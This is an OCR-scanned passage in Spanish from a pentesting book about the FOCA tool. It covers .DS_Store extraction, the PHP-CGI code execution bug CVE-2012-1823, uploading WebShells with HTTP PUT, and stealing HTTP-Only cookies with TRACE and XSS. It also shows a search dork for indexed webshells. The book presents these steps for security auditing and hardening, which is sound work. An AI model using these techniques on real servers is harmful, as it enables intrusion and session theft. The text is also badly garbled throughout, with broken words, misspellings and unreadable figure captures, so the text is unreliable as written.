Su  uso  es  muy  sencillo.Una  vez  que  se  hay  a  local  izado  un  fichero  .DS  Store  en  un  determ  in  ado 
servidor  web ,  la  herramienta  real  iza  la  extraccion  de  los  strings  del  archive,  la  construccion  de  las 
URLs  y  las  pide  todas  para  ver  si  existen  o  no  en  el  servidor  web ,  ejecutando  con  la  maquina  virtual 
de  Java  el  prograrna  DSStorejar,  al  que  se  le  debe  pasar  unicamente  eomo  parametro  la  Url  donde 
se  encuentra  el  fichero  .DSStore: 

$java  -cp  .  -jar  DS  Store  jar  HTTP  dfwww.servercom/ruta/.DS  Store  >  salidaJxt 


2  H  TTP  ://www.  digin  i  nja  ♦org/projec  tsl  1'db  PH P 

3  // TIP ://sourc e  forge,  NE 77proj  ects/idstore/files/ 
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Bug  PHP  CGI  Code  Execution 

Otra  de  las  vulnerabilidades  que  FOCA  es  capaz  de  encontrar  de  forma  automat ica  on  l os  servidores 
localizados  de  un  dominio  que  esta  siendo  anal  izado  es  un  peligroso  bug  de  PHP  en  modo  CGI 
que  permite  Code  Execution ,  y  que  a  tecta  a  to  das  las  instalaciones  de  PHP  en  modo  CGI  hasta  las 
versiones  5.4.2  y  5,3. 1 2.  A  dia  de  hoy  ya  no  es  demasiado  comun  encontrarlo  en  Internet  -  debido  a 
lo  mucho  que  lo  ban  exp  lota  do  end  mundo  del  e-crime,  pero  todavfa  da  muy  buenos  re  su  I  tad  os  en 
servidores  no  publicados  a  Internet  que  una  empresa  tenga  dentro  de  la  red,  asi  que  si  se  audita  una 
red  interna,  puede  dar  grand  es  resultados. 

Este  bug,  identificado  con  el  CVE-20 1 2-1823,  permite  llamar  directamente  desde  la  Url  a  los 
parametros  del  motor  PHP,  lo  que  provoca  que  se  pueda  ejecutar  codigo  remote  en  cualquier 
servidor  que  este  publieado  a  Internet  eon  una  instalacion  vulnerable. 

Con  los  parametros  de  llamada  que  pueden  inyectarse  en  el  motor  de  PHP  instalado  en  un  serv  idor 
web  se  pueden  hacer  cosas  bastante  curiosas.  For  ejempio,  podria  utilizarse  la  opcion  -s,  que  permite 
ver  el  codigo  fuente  del  codigo  a  ejecutarse  para  ver  si  existen  datos  sensibles  en  el  programa, 
con  usuarios,  contrasenas,  conexiones  a  bases  de  datos,  etcetera.  De  esla  forma,  incluyendo  un 
sencillo  -s  en  la  Url,  el  servidor  web  mostraria  el  todo  el  codigo  del  sitio  PHP  que  sc  esta  visitando, 
accediendo  a  to  da  la  in  form  ac  ion  de  configuracion  que  alii  se  eneuentre. 

Ademas,  con  el  modificador  -d  es  posible  incidir  en  los  parametros  de  ejecucidn  del  motor  PHP , 
de  forma  que  el  atacante  podria  escribir  su  propio  codigo  en  el  servidor,  por  ejempio,  para  obtener 
un  phpinfo  que  muestre  todas  las  variables  del  servidor.  O,  ineluso,  si  el  atacante  deseara  ejecutar 
directamente  una  WebSheil  que  le  de  acceso  a  todo  el  sitio,  se  podria  modificar  la  configuracion 
directamente  desde  la  Url  para  inseriarla  remotamente,  tal  y  como  sc  muestra  en  la  bgura  04.10,  en 
la  que  se  ha  incluido  una  WebSheil  C99. 


Imagen  04. 10:  Servidor  vulnerable  a  I  bug  PUP  CGI  Code  Execution. 
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La  historia  que  rodea  a  este  bug  es  muy  interesante  y  en  el  blog  de  los  descubridores  de  la 
Vulnerabilidad4,  un  equipo  de  hackers  que  participa  habitualmenle  en  competiciones  de  seguridad 
informatica  y  Hacking,  los  famosas  competiciones  de  CTF  (Capture  The  Flog),  puede  encontrarse 
informacion  mas  detallada  de  la  evolution  de  la  misma. 

En  Enero  de  201 1  ,  mienlras  el  eq  uipo  Eindbazen  parti cipaba  en  el  CTF  de  la  NullCon,  descubren  esta 
Vulnerabilidad  y  la  aprovechan  para  modi  bear  el  mareador  de  la  competition,  que  estaba  alojado  en 
los  servidores  de  Dream  Host. 

Tras  informar  del  bug  3.  PHP  eomienzan  a  estudiar  el  origen  de  la  Vulnerabilidad.  El  estandar  CGI 
pennite  que  se  ertvien  desde  el  query  string  argumentos  al  ejecu table  que  se  enc argue  de  !a  ejecution, 
y  Apache  lo  implementa. 

En  el  ano  2004  el  equipo  de  desarrollo  de  BMP  ya  conocia  los  problemas  que  esto  podria  acarrear 
en  entomos  PHP  y ,  por  tanto,  tomaron  las  medidas  oportunas  para  evitar  esta  situation,  De  hecho, 
la  documentation  dice  que  PHP ,  euando  se  ejecute  en  modo  CGI ,  ignorara  esos  argumentos.  Sin 
embargo,  el  equipo  Eindbazen  descubre  un  commit  en  el  sistema  de  control  de  versiones  de  Apache 
en  el  que,  por  error,  se  eliminaba  el  codigo  de  proteccion. 

Mientras  intemamente  en  el  equipo  de  desarrollo  del  proyecto  PHP  seguian  preparando  un 
pare  he  robusto  para  solucionar  este  bug,  alguien  publica  en  el  popular  sitio  de  noticias  Reddit, 
aparentemente  por  error,  un  mirror  del  bug  interne  que  se  conocia  en  PHP .  Tras  esa  publication, 
como  era  de  esperar,  rapidamente  se  hace  publico  un  exploit  totalmente  funcional  y  se  implementa 
la  automatization  del  ataque  en  el  framework  de  explotacion  de  vulnerabilidades  Mtfasploit,  io  que 
hace  que  el  proyecto  PHP  publique  un  pare  he  de  urgene  ia. 

Sin  embargo,  este  parche  de  emergencia  tambien  conti ene  una  Vulnerabilidad  que  hace  que  la 
proteccion  incluida  sea  facilmente  evitable  por  cualquier  atacante,  por  lo  que  se  abre  un  nuevo 
expediente  CVE-2012-23I I  para  su  seguimiento.  Finalmente  el  grupo  Eindzaben  hace  publica  una 
solution  para  implantar  sobre  el  parche  y  corregir  asr  la  Vulnerabilidad  mientras  en  PHP  sacan  una 
nueva  version  del  produeto. 

Cuando  se  extendio  este  bug ,  aparecieron  servidores  vulnerables  en  muchisimas  grandes  em  pres  as, 
y  en  sitios  extremadamente  populares  de  Internet,  como  por  ejemplo  Linked! N.  Este  sitio  web  tenia 
un  servidor  vulnerable  y  pocos  dias  despues  los  hashes  de  8  mi  Nones  de  contrasenas  de  usuarios 
dc  esta  popular  red  pro  ft  si  on  a  I  de  contactos  acabaron  publicados.  Por  supuesto,  aunque  no  hay 
informacion  detallada  de  como  se  hizo  este  ataque,  todo  el  mundo  apunta  a  que  se  utilize  esta 
Vulnerabilidad  como  primera  puerta  de  enlrada  a  la  red,  y  dc  ahf  a  la  base  de  dates  de  los  usuarios. 

Para  la  detection  de  esta  Vulnerabilidad,  FOCA  pide  las  URLs  con  PHP  anadiendo  el  para  metro  -s  y 
bu  sc  an  do  de  spues,  en  to  das  las  respuestas  obtenidas,  si  apareee  algun  codigo  PHP  reconocible*  Esto 
generara  no  solo  que  aparezea  en  este  nodo  de  vulnerabilidades,  sine  que  aparezea  tambien  en  el 
nodo  de  Data  Leak,  ya  que  las  fugas  de  codigo  PHP  tambien  son  monitorizadas  por  el  otro  modulo 
de  detection  de  vulnerabilidades. 


4  HTTP://  eindbazen  .NET/20 1 2/05/ PHP-  CGI-  ad  v  i  sory-  C  VE-2  0 1 2- 1  S23/#comment-3484 
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Metodos  HTTPinseguros 

Dentro  de  las  especifieaciones  del  protocolo  HTTP  con  el  que  se  comuni  can  die  rites  y  servidores, 
se  definieron  una  serie  de  verbos  o  metodos  para  dialogar  con  el  servidor  web  y  asi  poder  solicitar 
deierminados  comportamientos  depend  iendo  de  las  neeesidades  de  cad  a  si  l  u  ac ion.  Asi,  ademas  de 
los  famosos  metodos  GET  y  POST  para  solicitar  un  fichero  siluado  en  una  direecion  URL  concreta  o 
enviar  datos  a  un  programa  en  formato  de  texto  piano,  existe  una  eompleta  lista  de  verbos  definidos 
en  el  estandar  y  mecanismos  especiales  para  que  cualquiera  pueda  extender  y  crear  nuevos  verbos 
HTTP . 

A 1  gun  os  de  los  metodos  que  se  utiiizan  comunmente  en  los  sit t os  web  que  se  publican  en  Internet 
pueden  sen  por  citar  alguno  de  ellos,  el  metodo  HEAD ,  que  FOCA  usa  para  descubrir  el  tamano  del 
fichero  en  la  busqueda  de  documentos  antes  de  descargarlo  o  el  metodo  OPTIONS,  que  permite  ver 
la  lista  de  verbos  habilitados  en  una  determ inada  ubicacion  de  un  sitio  web,  tal  y  como  se  puede  ver 
en  la  bnagen  04 A  1 . 


F : \SWVnetcat >nc  _ 

OPTIONS  /HIFI  HTl 

HTTP/1.1  200  OK 

Date:  Med,  23  Jun  2010  07:41:01  GMT 
Server:  Apache/2. 0. 52  (Red  Hat) 

Allow:  GET,  HEAD ,  POST,  PUT,  DELETE,  TRACE,  OPTIONS 
Content  ^Lengt  h :  0 
Connection:  close 

Content-!  ype  :  t  ext /pi  a  i  n  ;  chars  et  =  i  5  o“8S59^  1 
Content -Language :  es 


Lmagen  04.1 1:  Metodos  HTTP  habilitados  cn  un  sitio  web. 


Sin  embargo,  algtmas  aplicaciones  web  habilitan  los  metodos  para  la  manipulacion  de  ficheros  en 
el  servidor,  tales  como  DELETE ,  MOVE ,  COPY  o  PUT.  El  metodo  PUT  permite  subir  ficheros  al 
servidor  o,  incluso,  reemplazar  archives  existentes,  ya  que  si  se  sube  un  fichero  eon  PUT  y  este 
existe,  entonces  se  sobrescribiria  el  anterior.  Estos  comportamientos  pueden  suponer  un  riesgo  para 
la  seguridad  de  un  sitio  si  se  dejan  habilitados  en  director ios  piiblicos,  aunque,  por  supuesto,  a  pesar 
de  que  este  habilitado  el  verbo  PUT  o  DELETE ,  el  usuario  con  que  corre  el  pool  de  la  apficacion 
deberia  Lener  permisos  para  poder  escribir  en  el  sistema  de  ficheros.  Si  asi  fuera,  subir  una  WebShell 
en  PHP,  ASP ,  JSP  o  lo  que  soporte  el  sistema  seriu  trivial.  Con  un  sencillo  PUT  /fichero .PHP 
HTTP!  1 . 1  un  atacante  podria  eomenzar  a  escribir  el  cod i go  fuente. 

Ademas  de  estos  verbos,  si  el  servidor  ha  habilitado  el  protocolo  WebDAV {Web-based Distributed 
Authoring  and  Versioning)  apareceran  los  verbos  de  trabajo  colaborativo  con  documentos  como 
LOCK ,  UNLOCK ,  PROPFIND.  PROP  PATCH  y  MKCOL. 

Logicamente,  cuando  se  realiza  una  auditoria  de  seguridad  a  un  servidor  web  es  conveniente  revisar 
esta  situacion  ya  que,  aunque  parezea  un  error  demasiado  obvio,  en  ocasiones  los  administradores 
publican  di recto ri os  con  estos  metodos  activos.  Utilizando  Shodan,  el  buscador  de  equipos  en 
Internet  presentado  en  e!  capitulo  3,  es  posible  comprobar  la  gran  cantidad  de  servidores  en  euyas 
respuestas  HTTP  ya  directamente,  sin  necesidad  de  hacer  un  escaneo  de  OPTIONS,  informan  de  que 
soportan  el  metodo  PUT. 
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Como  $e  ha  comentado,  que  el  servidor  web  informe  de  que  soporta  el  metodo  PUT  no  quiere  decir 
qne  real  men  te  este  implementado  ni  que  los  perm  isos  que  tenga  en  el  sistenia  de  archives  sean  los 
necesarios  para  poder  escribir  los  ficheros,  pero  viendo  la  gran  cantidad  de  sites  donde  aparecen, 
siempre  es  i  mere  same  com  probar  esta  situacion  durante  una  auditoria  por  si  fuera  posible  subir  una 
WebSheli  a  alguno  de  los  servidores  descubiertos. 


En  estamisma  linea,  tambien  es  posible  localizar  los  pennitidos  en  A ccess-ControI -A l low- Methods, 
que  aunque  son  pohticas  para  peti clones  AJAX  Cross-Domain 5  es  mas  que  probable  que,  si  dene  el 
metodo  PUT  permitido  para  el  las,  tambien  lo  tenga  como  metodo  HTTP.  Aunque,  si  lo  que  sc  busca 
es  una  Vultierabilidad,  puede  que  con  un  metodo  DELETE  sea  mas  que  suheiente  para  tirar  abajo 
una  aplicacion  web. 


AuijHMf  <sn  m  2412 

St  SMlte 


sw  Oft 


wmn  noi 

D*tc;  Tis,  09  Oct  20  i2  01  .19:44  GMT 
Allow:  GTT^trr  .OPTIONS  nf-  A  D 
Conitstrt-Tsrpe 

Apache  Tomcatfe, 0,35  -  Error  report 

EITn?i,0  4G4N*tR>Liad 
Ootc:  Moa,  Oi  Oct  20 1 1  213:49  GMT 
Server :  Apacfa  1 . 1 

Ataiert-'Ca  rahru '  -  Allow  ‘Origin.  * 

Aeee^^rrtn3^  4tlo»-Vk<ho4s  GET,  POST,  MUIS,  PUT 
Afi*  w  Htwter  sc 

Control  -Type;  9: t tb Lm t h  crsci'-u  it'  £ 

Error  401  -  Unauthorized 

HTTm  0  401  UnAtiiht.f  ijKd 
Orir:  Wed.  03  Nov  2012  10:45:45  GMT 
Server  VIP  Ckptmo  Weft  Serve* 
Allow ;  GET.  HEAD.  DELFTE 
WWW-  AutbcntK'Jiic  Italic  ratlin  W 
rr>j*h: 

CVuiem- T>  pc  icn^lum] 


Imagen  04.12:  M£todos  PUT  y  DELETE  pennitidos  en  A  Ihw  y  Access -Control- Allow- Me  (hods. 


Para  agi  lizard  proceso  de  detection  de  servidores  vulnerables,  FOCA  implementaesla  busqueda.  1*0  r 
cada  dominio  web  que  se  deseubre,  se  genera  una  lista  de  URLs  detectadas  en  los  buscadores*  Estas 
URLs  pueden  venir  de  la  busqueda  de  documentor,  de  la  busqueda  de  servidores  del  descubrimiento 
de  la  red,  buscando  las  tecno  logins  utilizadas  en  el  dominio  o,  directamente,  buscando  todos  los  links 
en  los  buscadores  rclativos  a  ese  dominio. 

Con  el  objelivo  de  detectar  que  ubicaciones  tienen  algun  metodo  que  pudiera  ser  potencialmente 
inseguro  para  el  sitio  web,  FOCA  extraera  todos  los  director! os  y  realizara  una  comprobacion  para 
saber  cuales  son  todos  los  verbos  habilitados  en  el,  usando  para  el  lo  una  petition  con  el  metodo 
OPTIONS  que  ya  se  ha  citado.  Si  aparece  algun  metodo  potencialmente  inseguro,  como  DELETE , 
PUT  o  TRACE,  la  herramienta  alertara  de  ello. 
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Subida  de  WebShells  con  metodos  PUT 

Ademas,  FOCA  no  solo  in  form  a  de  I  os  servi  dor  es  donde  se  han  loealizado  estos  metodos  mseguros, 
sino  que  se  ha  anadido  un  menu  contextual  que  permite,  de  forma  seneilla,  explotar  una  vulnerabi  lidad 
de  PUT  o  DELETE  para  subir  o  borrar  un  fkliero  en  el  servi  dor. 


Imagen  04. 1 3:  Subiendo  un  fichero  a  un  servi  dor  web  vulnerable  . 


Esta  opeion  de  FOCA  no  debe  usarse  alegremente,  ya  que  cuando  se  esta  haeiendo  una  auditor! a 
de  seguridad  weh  hay  que  tener  especial  cuidado  a  la  hora  de  realizar  ciertas  acciones  de  post- 
exp  lotac  ion,  sobre  todo  si  la  aplieaeion  weh  del  client e  esta  en  produce  I  on  en  esos  momentos.  En 
este  sentido  es  posible  que  el  uso  de  WebSbells  durante  una  auditor  la  de  seguridad  pueda  llegar  a 
poner  en  riesgo  al  cliente  de  diferentes  man  eras. 

For  un  lado,  una  vez  que  se  haya  subido  la  WehShell  exisle  la  posibi lidad  de  que  llegue  la  arafia 
de  Google,  o  cualquier  otro  buscador,  y  la  WebSheil  quede  Index  ad  a  en  las  bases  de  dates  de  los 
mot  ores  de  busqueda.  A  parti  r  de  ese  momento,  la  WebSheil  podra  ser  encontrada  en  las  bases  de 
dalos  de  los  buscadores,  donde  en  la  actual idad  es  lacil  local izar  miles  de  shells  utilizando  diferentes 
dorks,  tal  y  como  se  muestra  en  la  figura  04. 1 4. 

Por  tanto,  si  se  sube  un  WebSheil  durante  una  auditoria,  es  reeomendable  que  se  haga  en  un  directorio 
no  Index  able,  que  se  proteja  su  acceso  mediante  una  password  y  que  sea  red  rad  a  nada  mas  termmar 
con  las  pruebas  que  se  esten  realizando  en  el  momento.  La  idea  de  dejar  la  WebSheil  subida  para 
hacer  pruebas  mas  larde  es,  por  consiguiente,  total  me  nte  desaconsejable. 
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Por  otra  parte,  existe  el  riesgo  de  que  la  WebShell  que  vaya  a  ser  subida,  y  que  ha  si  do  descargada 
desde  algun  sitio  de  Internet,  realice  mas  acciones  de  las  que  se  indican  en  su  manual  de  usuario.  No 
es  nuevo  que  una  WebShell  se  ponga  en  Internet  eon  una  bonita  sorpresa  en  forma  de  conexion  a  un 
servidor  de  otro  atacante  en  la  que  se  reporta  la  Url  en  la  que  ha  side  subida  esta  WebShell. 


intitta:* *-  N3f  f1letype;php  undetectable  Buscar 

40Q  mitjhsow  (0  20  sAguftdO&j  Bunctueda 

Sugwrida  Buacaf  rasaliadas  ttspaftol  «i  idiwna  de  bussed* 

*n  Preference. 

vAvw  maFlIaqezan  cl  -  N3t 

13  Ok  2010  ...  N3esI»II  v  En>p3rof  Undetectable  #18  Madded  by  $pyn3t  @  gmaii  tom\ 
EmpSrof  Team  S  Generation  lime.  £>.0160  J- 

wtiw  marllagezan  cMofamter/  /75T30e^eet  php^ect  -  En  cache 

www  QuindKj  gov  co  >  N3t 

j  oft  J  Go  thr  :  Go  Fde  — {  N3tshc4l  v  EmpSrof  Undetectable  Molded  by  Spyn3l 
^  gmgit  cwn|  Empire*  Team  j  Generation  time  D  1 T24  |  - 

feTtoci/gcntrafttil  php  ■  £n  cethS 

WWW  jir>di ffialli  C Otn  -  N3t  ■  [  Trartucir  esta  pag*na  | 

|  ok  ].  .:  Go  Oir  Go  Fae  -{ N3tsbe1l  v.  En*p3ra*  Undetectable  #13  Madded  by  Spyn3l 
@  gmait  comi  &np3ror  Team  I  Generabqri  hm$:  Q.D079  ]— 
wm.un&frm  tomf  fcwdj  292012044  pbp7  -  Dinartwca  *  En  each# 

amawear  com  -  N3t  -  \  Tfaducir  esta  p&gina  ] 

7  Dec  2010  N3t^heH  v  Empire*  Undetectable  #f8  Madded  by  Spynll  @  giftail  comf 
Emp3w  Team  I  Gsner^icw  |im«.  0  OflEG  J-- 

arnov^ar  coiWK3eK.pbp^*c(=e:btHJi  -  En  cacM? 

aligsblgnes  com  -  W3t 

If  a  un  Director^  Ire  un  Archive  ;  «-[ N3tehe!t  v,  Emp3for  Undeieetabte  #13  Moddfcd  by 
Spyn3l  @  gmail  con i|  Emplror  Teem  I  Generation  tame  0.0802  ]- 

.  *k amhLuw^ *c in n J^V^r t ■.fja.r.ftE.V  - - -  ■■->■<— 

Ini  n  gen  04,14:  Webs  hells  Index  adas  en  Google. 


Si  no  sc  Liene  cuidado,  es  posible  que  se  suba  una  WebShell  al  serv  idor  de  un  diente  y  que  de  forma 
automatics  se  informe  de  esta  situation  a  un  verdadero  atacante  que  se  eoneete  a  ella  e  incurra  en 
dahos  importantes  en  los  equipos  del  diente.  Para  saber  si  una  WebShell  esta  troyanizada,  antes  de 
utilizarla  con  confianza  se  debe  comprobar  en  los  propios  servidores  del  auditor  para,  ulilizando 
Firebug  en  Firefox  o  el  analisis  de  conexiones  dc  Google  Chrome ,  comprobar  a  que  sitios  se  esta 
conectando  esta  WebShell. 

No  obstante,  en  la  actual  i  dad  existen  teenicas  que  intentan  evitar  esta  deteccion  simple  y  realizan 
reportes  en  diterido  o  en  situaciones  concretas,  asi  que  el  analisis  realizado  debe  ser  riguroso  y 
man  tern  do  en  el  tiernpo,  ya  que  unas  pruebas  ligeras  y  rapidas  podrian  derivar  en  una  situation 
realmente  desagradable.  Para  evitar  este  tipo  de  situaciones,  quizas  la  mejor  idea  es  que  el  auditor 
prepare  sus  propias  herramientas  y  dcsarrolte  una  WebShell  propia  que,  aunque  sea  mas  litnitada, 
permitira  que  sea  subida  a  los  servidores  de  los  clientes  con  tranquilidad  ys  ademas,  se  evitara  su 
deteccion  por  parte  de  determinadas  soluciones  de  antimalware  o  IDS. 
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Hijacking  de  cookies  HTTP-Only  con  XSS  usando  TRACE 

FOCA ,  por  otra  parte,  ademas  de  los  metodos  PUT  y  DELETE  tambien  trata  de  tocalizar  el 
metodo  TRACE  en  la  fase  de  busqueda  de  metodos  inseguros,  ya  que  puede  uLilizarse  para  realizar 
Hijacking  de  cookies  HTTP- Only  con  XSS,  on  ataque  que  ya  cuenta  con  varios  anos  de  vida  y  que 
fue  descubierto  Jeremiah  Grossman. 

A  principios  del  siglo  XXI,  las  aplicaciones  web  adolecian  de  multiples  vulnerabilidades  en  el 
codigo  que  las  hacian  propen sas  a  machos  ataques.  Entre  los  fallos  de  seguridad  mas  populares  se 
enconlraban  los  fallos  de  XSS  ( Cross-Site  Scripting).  Sin  embargo,  aun  solo  se  estaba  empezando 
a  bosquejar  lo  que  podrian  suponer  los  ataques  Client-Side,  es  decir,  atacar  al  usuario  en  lugar  de  a 
los  servidores. 

Una  de  las  lecnicas  mas  comunes  para  atacar  a  I  usuario  era  robarle  la  sesion,  es  decir,  hacer  un 
Hijacking.  Hacerlo  con  XSS  era  tarea  send  II  a.  B  as  tab  a  (y  aun  basta)  con  inyectar  un  codigo  Javascript 
que  accediese  a  la  cookie  para  enviarla  a  un  servidor  controlado  o  dejarla  en  una  ubicacion  accesible 
remotamente. 

Como  arreglar  todas  las  vulnerabilidades  de  XSS  era  una  tarea  inabordable,  la  industria  decidio 
aplicar  medidas  de  fortificacion,  con  lo  que  a  la  cookie  se  la  empezo  a  poder  poner  flags  como 
Secure^  para  que  i’uera  solo  bajo  eoncxiones  HTTP- s  o  HTPPOnly,  para  que  no  fuera  accesible  por 
codigo  script,  y  solo  se  enviara  en  conexiones  HTTP.  Y,  preeisamente,  ahi  interviene  el  metodo 
TRACE  y  el  ataque  que  descubrio  Jeremiah  Grossman  que  permite  robar  una  cookie  marcada  con 
HTTP  Only  median  te  un  ataque  XSS, 

Si  en  un  servidor  web  se  encuemra  activo  e  implementa  el  metodo  TRACE  y  existe  un  bug  XSS  en 
una  aplicacion  web  que  corra  sobre  esc  servidor  que  pueda  ser  utilizado  para  generar  una  peticion 
TRACE ,  entonces  se  podra  robar  la  cookie  aunque  este  marcada  como  HTTP  Only,  La  idea  es  tan 
simple  como  que  el  navegador  no  va  a  permitir  aeceder  por  medio  de  codigo  script  a  la  cookie,  pero 
cuando  se  realiee  una  peticion  HTTP  sera  el  mismo  quien  anada  la  cookie  de  la  sesion  que  busea  el 
atacante  a  la  peticion  TRACE. 

Como  la  peticion  es  un  metodo  TRACE,  en  la  respuesta,  ya  no  como  una  cookie  sino  como  un  cuerpo 
de  mensaje,  podra  leerse  el  valor  de  la  cookie  que  entonces  si  sera  accesible  por  Javascript.  Es  por 
este  motive  que,  si  no  se  esta  haciendo  uso  del  metodo  TRACE  por  parte  de  ningun  software  en 
concrete,  en  las  auditorias  de  seguridad  se  suele  recomendar  deshabilitarlo  o  prohibirlo,  para  evilar 
que  alguien  pueda  hacer  uso  de  el  si  se  dan  todo  el  resto  de  condicionantes. 

S  upon  gam  os  un  servidor  web  como  el  del  Club  Atletico  Osasuna  en  la  que,  haciendo  uso  del  metodo 
OPTIONS  se  puede  ver  que  tiene  habilitado  el  metodo  TRACE .  Como  se  ha  explieado,  el  metodo 
TRACE  io  unico  que  hace  es  devolver  una  respuesta  200  en  la  que  sc  eopia  lo  que  se  le  ha  enviado  por 
el  metodo  TRACE .  Hay  que  decir  que,  en  muchos  servidores  aparece  cn  la  respuesta  de  OPTIONS 
que  esta  habilitado,  pero  luego  cuando  se  hace  la  prueba  devuelve  un  mensaje  403  de  Forbidden  o 
un  501  de  Not  Implemented,  por  lo  que  es  necesario  probarlo.  En  el  ejemplo  que  estamos  viendo,  el 
metodo  esta  habilitado  y  esta  ademas  implementado,  por  lo  que  puede  hacerse  uso  de  61. 
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Si  esto  es  asi,  y  exist!  era  un  bug  XSS  en  una  aplicacion  web  que  eorra  sabre  ese  servidor  que  p  Lie  da 
ser  ulilizado  para  general’  una  pelicion  TRACE,  entonces  sc  podra  robar  la  cookie  aunque  este 
marcada  como  HTTP  Only. 

Como  la  peticion  es  un  metodo  TRACE,  en  la respuesta,  ya  no  como  una  cookie  sino  como  un  euerpo 
de  mensaje  podra  leerse  el  valor  de  la  cookie  que  entonces  si  sera  accesible  por  Javascript. 


Imagen  04, 1 5:  Si  se  envia  una  cookie  en  la  petici6n  TRACE  vuclvc  cn  el  codigo 

En  la  imagen  superior  se  puede  ver  en  Burp  como  se  pide  un  metodo  TRACE  en  el  que  el  navegador 
ha  enviado  la  cookie  -  que  podria  ser  HTTP  Only  -  y  se  obtiene  como  texto  en  el  euerpo  de  la 
respuesta  que  envia  el  servidor. 

Es  por  todo  esto  que,  si  no  se  esta  haciendo  uso  del  metodo  TRA  CE  por  parte  de  ningun  software  en 
concrete  en  un  servidor  web  que  se  encuentre  cn  produce  ion,  en  to  das  las  auditorial  de  seguridad 
siempre  recoin endato os  deshabilitarlo  o  prohibirlo,  para  evitar  que  alguien  pudiera  haeer  uso  de  el  si 
se  dan  todo  el  resto  de  condieionantes,  y  conseguir  un  ataque  funcional  en  este  entorno. 


154 


Pentesting  con  FOCA 


Juicy  files 

Para  un  pentester,  los  juicy  files  son  aquellos  tipos  de  ficheros  que  suelen  contener  dates  jugosos  para 
la  realizaeion  de  la  auditoria,  es  dec  in  aquellos  de  los  que  se  suele  extraer  mucha  informacion.  Los 
ficheros  que  FOCA  catalog  a  como  juicy  files  son  aquellos  que  tienen  una  extension  sospechosa  de 
contener  informacidn  interesante,  como  los  .bak  o  los  .old,  los  archives  que  por  su  extension  puedan 
a  pnori  resultar  interesantes,  o  los  servidores  en  los  que  se  localizan  puertos  abiertos  diferentes  al 
80,  como  el  puerto  8080,  por  ejemplo. 

Asi,  en  !a  pe&tana  juicy  files  de  las  opeiones  de  FOCA ,  se  puede  configurer  el  programa  (con  una 
lista  blanca  y  una  lista  negra)  para  que  incluya  ficheros  que,  bien  por  la  ruta  en  la  que  se  encuentran, 
o  bien  por  su  extension,  el  pentester  considere  que  merecen  un  analisis  mas  detallado. 

Para  local izar  todos  estos  ficheros  jugosos,  FOCA  no  solo  usa  Google  Crawling  y  Bing  Crawling , 
sino  que  aprovecha  la  informacion  que  aparece  en  los  ficheros  . listing ,  descritos  a  conti  nuacidn, 
busca  los  dircctorios  que  permiten  un  listado  de  archives,  saea  partido  del  contenido  de  los  archives 
robots  Jxt  y  busca  puertos  inusuales  en  los  servidores  del  dominio  objetivo. 


Imagcra  04, 1 6:  Opeiones  de  configuration  de  busqueda  de  ficheros  jugosos. 


Respecto  a  los  ficheros  robots  Jxt,  lo  cierto  es  que  son  una  fuente  muy  valiosa  de  informacion.  El 
deseonoeimiento  genera! izado  de  los  administradores  web  sobre  su  fiincionamiento  y  cl  hecho  de 
que  cada  buscador  lo  implementa  de  una  forma  distinta,  al  no  tratarse  dc  un  estandar,  hacen  que 
en  muchas  ocasiones  se  incluyan  instrucciones  con  la  intencion  de  informar  a  los  robots  de  los 
buscadores  que  un  determinado  directorio,  por  ejemplo,  no  debe  ser  Index  ado,  y  lo  que  oeurre  es 
que,  no  solo  son  /mVexadas  por  los  buscadores,  sino  que  esas  instrucciones  ofrecen  a  los  visitantes 
curiosos  un  pun  to  de  partida  para  sus  pruebas  e  investigaciones,  y  que,  por  supuesto,  FOCA  incluira 
como  ficheros  jugosos, 

Respecto  a  la  local  izac  ion  de  puertos  inusuales  en  los  servidores  del  dominio  anal  izado,  FOCA 
utiliza  un  truco  conocido  como  Google  Slash  Trick,  del  que  ya  sc  habld  en  el  capitulo  3,  que 
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pennite  encontrar  servidores  eseuchando  en  un  detenninado  puerto.  A  si,  por  ejemplo,  para  localizar 
servidores  de  un  detenninado  dominio  trabajando  en  el  puerto  SOSO,  se  nsaria  la  cadena  site:/ 
dominio:  8080/,  incluyendo  una  barra  4  / 4  entre  el  operador  site:  y  el  n ombre  de  dominio  objetivo. 


Uno  de  los  tipos  de  archivos  que  FOCA  incorpora  eomo \  juicy  files  son  !os  ficheros  SWF  (inicialmente 
Shockwave  Flask  y  luego  Small  Web  Format ),  que  es  el  formato  de  archivos  Adobe  Flash  utilizado 
para  graft  cos  vectorlales  multimedia  y  ActionSeript.  Aunque  se  trata  de  archivos  compi  lades, 
estos  ficheros  pueden  ofrecer  al  auditor  una  gran  cantidad  de  mformacion  sobre  rutas,  usuarios  y 
passwords  embebidos,  links  a  archivos  locales,  rutas  a  ficheros  almacenados  en  perfiles  locales, 
etcetera.  Para  poder  acceder  a  esta  in  form  ac  ion  almacenada  dentro  de  los  archivos  es  necesario 
descompilarlos,  y  para  llevar  a  cabo  esta  tarea  puede  utilizarse,  por  ejemplo,  el  sitio  web  Show 
My  Code \  El  funeionamiento  de  esta  aplicacion  web  es  muy  sencillo,  ya  que  tan  solo  es  necesario 
proporcionar  la  Ur l  del  archivo  que  se  quiera  decompiler  (la  aplicacion  admite  los  tipos  swf,  encoded 
PHP ,  Java  class ,  .NET  y  codigos  QR)  y  rellenar  un  sencillo  captcha  de  una  unica  letra,  por  lo 
que  es  posible  analizar  este  tipo  de  ficheros  de  manera  rapida  y  comoda.  Adcmas,  la  herramienta 
permite  descargar  el  codigo  para  que  el  auditor  pueda  estudiarlo  en  su  equipo  y  realizar  busquedas 
de  cadcnas  que  sean  de  su  inter  es.  No  obstante,  Show  My  Code  no  devuelve  el  FLA,  por  lo  que  los 
archivos  embebidos  o  el  rcsto  de  informacion  del  SWF  se  queda  fuera  y,  por  tanto,  se  requeriran 
otros  tipos  dc  herramientas  para  su  acceso. 


"  #endi  rn  tetip 
stop  t ) i 

// - - - - - - - ' - 

ff  Instance*  of  Syntoal  Jiff  5  MovieClip  txcExternulCaBponentSyaboU  mxcExternai€anponsntSyrt^ 

ft - * . -  - - - - . . . .  . 

ft component  parameters 
one  tip  event  construct  { 
extemalFite  *  i 
externalFile . embed  =  true 

extern  at  File  fiteNaie  -  "C;  WDOCUHE  -l\\M^riaooK\\CONRe-l\\Temp\\ii21  ; 
extemalFile .  ctif>Na»e  =  ueBbed_6S^5'2^  j 

gitemalFile .  pathname  -  "CAVtocuments  and  Settingst\M3r:annM\\EscritorioW:iberprpgi| 
extarnatrite . bgType  =  “jpg’: 
extemalFile.  bgWi  dth  ■  20G. 
external Fite  bgHsight  -  200; 
external  File  bgColor  =  “Gxf ff fff" : 

^xterrialFile  bg£JG  =  true 
